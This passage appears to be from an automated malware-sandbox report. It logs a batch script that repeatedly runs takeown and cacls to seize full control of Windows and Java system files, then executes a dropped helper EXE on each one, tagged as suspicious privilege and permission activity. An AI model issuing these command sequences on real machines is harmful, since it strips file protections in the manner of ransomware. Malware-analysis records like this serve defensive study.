C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵PID:4280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:1112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
PID:664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "store.db" -nobanner3⤵PID:408
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵PID:4744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵PID:4628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "classes.jsa" -nobanner3⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "wabmig.exe" -nobanner3⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:1056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:2620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:1232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:1148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:636
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:2376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3284
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:2640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:4624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "classes.jsa" -nobanner3⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:2364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "wab.exe" -nobanner3⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:2756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:2144
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2300
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵PID:1904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:784
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:2056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:2324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:2400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2848
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵PID:2000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1940
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:2080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4492
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵PID:2512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:3648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:1304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:540
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:4844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:2000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4384
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:3472
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:2148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2680
-
-
-
